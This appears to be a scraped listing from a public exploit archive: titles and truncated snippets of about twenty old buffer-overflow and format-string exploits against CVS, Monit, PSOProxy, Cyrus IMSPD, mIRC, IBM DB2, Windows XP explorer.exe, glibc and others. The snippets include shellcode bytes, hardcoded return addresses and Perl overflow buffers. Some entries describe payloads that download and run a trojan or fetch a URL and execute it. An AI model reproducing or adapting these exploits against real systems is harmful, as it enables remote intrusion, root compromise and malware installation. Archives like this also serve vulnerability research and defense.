CVS - Remote Entry Line Root Heap Overflow

include include include include include include include include include include include include include include define CVSPORT 2401 define RET 0xffbffd20 define NOP 0x82102017 define ROUNDs if s % wordsize s += wordsize - s % wordsize unsigned char root; unsigned char user; unsigned char pass;...

Monit 4.1 - Remote Buffer Overflow

!/usr/bin/perl monit \n\n"; exit0; print "HOST:\t$ARGV0\n"; print "PORT:\t2812\n"; my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; esp mandrake 9.1 my $buffer = "A" x 284 . "XXXX" . "B" x 100; dos and debug print "connecting to server...\n"; $socket = IO::Socket::INET - new PeerAddr =...

PSOProxy 0.91 (Windows 2000XP) - Remote Buffer Overflow

PSOProxy 0.91 Windows 2000XP - Remote Buffer Overflow / Copyright © Rosiello Security http www rosiello org ================ -== Remote Exploit for PSOProxy version v0.91 ==-- Code by: rave Contact: [email protected] Date: Feb 2004 Bug found by: Donato Ferrante There is a vulnerability found in t...

Xsok v1.02 ""-xsokdir"" local buffer overflow game exploit

No description provided by source. / 0x333xsok 2 = xsok 1.02 local game exploit Happy new year ! 2 : coded by c0wboy c 0x333 Outsiders Security Labs / www.0x333.org / include stdio.h include unistd.h define BIN "/usr/games/xsok" define RETADD 0xbffffa3c define SIZE 200 unsigned char shellcode = /...

XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun

// source: https://www.securityfocus.com/bid/9341/info xsok is prone to a locally exploitable buffer overrun vulnerability due to insufficient bounds check of data supplied through the LANG environment variable. This could be exploited to execute arbitrary code with elevated privileges. The progr...

Cyrus IMSPD v1.7 abook_dbname Remote Root Exploit

Exploit for linux platform in category remote exploits ================================================= Cyrus IMSPD v1.7 abookdbname Remote Root Exploit ================================================= / Cyrus IMSPD Remote Root Exploit ------------------------------- Bug found by: Felix Lindner...

Cyrus IMSPD 1.7 - abook_dbname Remote Code Execution

Cyrus IMSPD 1.7 - abookdbname Remote Code Execution / Cyrus IMSPD Remote Root Exploit ------------------------------- Bug found by: Felix Lindner Exploit coded by: SpikE Exploitation techinique: As said by Felix Lindner, the bug lies in the "abookdbname" function. To cause the overrun, we must ca...

Eznet 3.5.0 - Remote Stack Overflow Denial of Service

Eznet 3.5.0 - Remote Stack Overflow Denial of Service !/usr/bin/perl -w Stack Overflow in eZnet.exe - Remote Exploit Will download a trojan from any address which you provide on the target system, then will execute the trojan. For this exploit I have tried several strategies to increase reliabili...

Cyrus IMSP Daemon 1.x - Remote Buffer Overflow

Cyrus IMSP Daemon 1.x - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/9227/info A problem has been identified in the Cyrus IMSP Daemon implementation when handling certain types of requests. Because of this, it may be possible for a remote attacker to gain unauthorized acces...

Solaris Runtime Linker (SPARC) - 'ld.so.1' Local Buffer Overflow

/ ld.so.1 exploit SPARC coded by: osker178 bjr213 psu.edu Alright, so this exploits a fairly standard buffer overflow in the default Solaris runtime linker ld.so.1 discovery by Jouko Pynnonen Only real deviation here from the standard overflow and return into libc scenario is that at the time tha...

mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow

/ remote mirc 998 chars to someone on IRC is simply NOT done : Then I remember the iframe-irc:// flaw found by uuuppzz 2 This exploit will write an malicious HTML file containing an iframe executing the irc:// address. So you can give this to anyone on IRC for example ; The shellcode included doe...

IBM DB2 Universal Database 7.2 (db2licm) Local Exploit

Exploit for linux platform in category local exploits ====================================================== IBM DB2 Universal Database 7.2 db2licm Local Exploit ====================================================== / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by...

IBM DB2 - Universal Database 7.2 db2licm Local Overflow

IBM DB2 - Universal Database 7.2 db2licm Local Overflow / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu / char sc= "\x31\xc0" / begin setuid 0 / "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08"...

xtokkaetama 1.0b Local Game Exploit (Red Hat 9.0)

Exploit for linux platform in category local exploits ================================================= xtokkaetama 1.0b Local Game Exploit Red Hat 9.0 ================================================= / xtokkaetama 1.0b local game exploit on Red Hat 9.0 Coded by brahma 31/07/2003...

Microsoft Internet Explorer - Object Tag (MS03-020)

!/usr/bin/perl Proof of concept exploit on IE 5.x - 6.x by Alumni IE-Object longtype dynamic call oferflow url:// the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near '&CLSID=AAA...2F2F...'. To exploit: i start server perl script; ii...

kon2 exploit!!

I look kon2 source and -Console arg is the problem, so here go the PoC. ----cut here-------- !/usr/bin/perl Priv8security.com kon2 version 0.3.9b-16 and local root exploit. Tested on Redhat 8.0. should work on 9.0 and 7.3 Bug happens on -Coding arg. Based on Redhat Advisory. wsxz@localhost buffer...

Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow

include include include include include char shellcode= //download url and exec shellcode //doesn't have any hardcoded values //except the base address of the program //searches the import table for //LoadLibraryA, GetProcAddress and ExitProcess. //by .einstein., dH team...

MS Windows XP (explorer.exe) Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ==================================================== MS Windows XP explorer.exe Buffer Overflow Exploit ==================================================== include include include include include char shellcode= //download url and exec...

GLIBC locale - Format Strings

/ su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a" "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"...

New buffer overflow in plaetDNS

hi planetdns http://www.planetdns.netis commercial software package that allows you to turn computer into an Internet server. and be able to create an Internet Name, connect to a web server, FTP, mail server, etc. running on your computer. planetdns is vulnerable has a buffer overflow with a...